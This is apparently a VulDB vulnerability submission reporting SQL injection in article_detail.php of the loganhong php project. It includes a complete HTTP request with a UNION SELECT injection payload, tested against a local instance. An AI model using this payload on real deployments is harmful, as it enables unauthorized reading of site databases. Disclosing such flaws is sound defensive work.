| عنوان | loganhong php 1 SQL Injection |
|---|
| الوصف | Set up this project: https://github.com/loganhong/php
In the project file /includes/article_detail.php.
The above code directly concatenates the variable $id into the SQL query statement without any escaping or parameterization.
Set up locally and test using sqlmap.
Sending requests with Burp Suite:
-----------------------------------------------------------------------------------
GET /php-master/includes/article_detail.php?id=-7161%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7170707171,0x746978664a47627a6f7a62737361695a467564686d44666678624b736b6c414f594552456975546c,0x7171627071),NULL,NULL,NULL--%20-%20--- HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
---------------------------------------------------------------------------
Obtained the data.
|
|---|
| المصدر | ⚠️ https://github.com/ssiled/cve/issues/1 |
|---|
| المستخدم | silence. (UID 93672) |
|---|
| ارسال | 19/12/2025 05:23 PM (4 أشهر منذ) |
|---|
| الاعتدال | 21/12/2025 05:41 PM (2 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 337720 [loganhong php loganSite حتى c035fb5c3edd0b2a5e32fd4051cbbc9e61a31426 Article article_detail.php معرف حقن SQL] |
|---|
| النقاط | 20 |
|---|